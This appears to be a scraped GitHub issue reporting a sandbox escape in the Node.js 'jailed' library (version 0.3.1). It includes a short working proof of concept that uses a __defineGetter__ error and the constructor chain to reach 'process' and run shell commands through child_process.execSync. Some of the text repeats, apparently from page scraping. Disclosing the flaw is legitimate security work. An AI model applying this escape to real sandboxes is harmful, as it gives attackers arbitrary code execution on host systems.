Open seongil-wi opened 1 year ago
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js
var jailed = require('jailed'); var api = {}; var plugin = new jailed.Plugin('./test_case.js', api);
test_case.js
try { __defineGetter__("x", ) } catch (pp) { pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } application.disconnect();
Sandbox can be escaped by calling __defineGetter__ or __defineSetter__. Also, we can execute arbitrary shell code using process module.
__defineGetter__
__defineSetter__
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js
test_case.js
Sandbox can be escaped by calling
__defineGetter__
or__defineSetter__
. Also, we can execute arbitrary shell code using process module.